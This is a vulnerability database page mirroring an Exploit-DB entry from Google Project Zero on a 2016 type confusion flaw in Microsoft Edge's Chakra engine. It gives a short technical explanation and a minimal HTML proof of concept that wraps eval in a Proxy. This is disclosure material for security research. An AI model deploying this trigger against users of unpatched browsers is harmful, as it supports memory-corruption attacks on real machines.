Lucene search
+L

Microsoft Edge - 'eval' Type Confusion

🗓️ 17 Nov 2016 00:00:00Reported by Google Security ResearchType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

Microsoft Edge 'eval' Type Confusion vulnerability found in Chakra JavaScript engin

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Microsoft Edge - eval Type Confusion Vulnerability
18 Nov 201600:00
zdt
attackerkb
ATTACKERKB
CVE-2016-7200
10 Nov 201600:00
attackerkb
attackerkb
ATTACKERKB
CVE-2016-7202
10 Nov 201600:00
attackerkb
attackerkb
ATTACKERKB
CVE-2016-7243
10 Nov 201600:00
attackerkb
attackerkb
ATTACKERKB
CVE-2016-7208
10 Nov 201600:00
attackerkb
attackerkb
ATTACKERKB
CVE-2016-7201
10 Nov 201600:00
attackerkb
bdu_fstec
BDU FSTEC
Microsoft Edge browser vulnerability, which allows a hacker to trigger a service failure or execute arbitrary code
15 Dec 201600:00
bdu_fstec
circl
Circl
CVE-2016-7240
17 Nov 201600:00
circl
cnvd
CNVD
Microsoft Edge Scripting Engine Memory Corruption Vulnerability (CNVD-2016-10946)
9 Nov 201600:00
cnvd
checkpoint_advisories
Check Point Advisories
Microsoft Edge Scripting Engine Memory Corruption (MS16-129: CVE-2016-7240)
8 Nov 201600:00
checkpoint_advisories
Rows per page
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=948

In Chakra, function calls can sometimes take an extra internal argument, using the flag CallFlags_ExtraArg. The global eval function makes assumptions about the type of this extra arg, and casts it to a FrameDisplay object. If eval is called from a location in code where an extra parameter is added, for example, a Proxy function trap, and the extra parameter is of a different type, this can lead to type confusion. A full PoC is as follows and attached:

var p = new Proxy(eval, {});
p("alert(\"e\")");
-->

<html>
<body>
<script>
var p = new Proxy(eval, {});
p("alert(\"e\")");
</script>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Nov 2016 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 37.5
CVSS 27.6
EPSS0.66469
37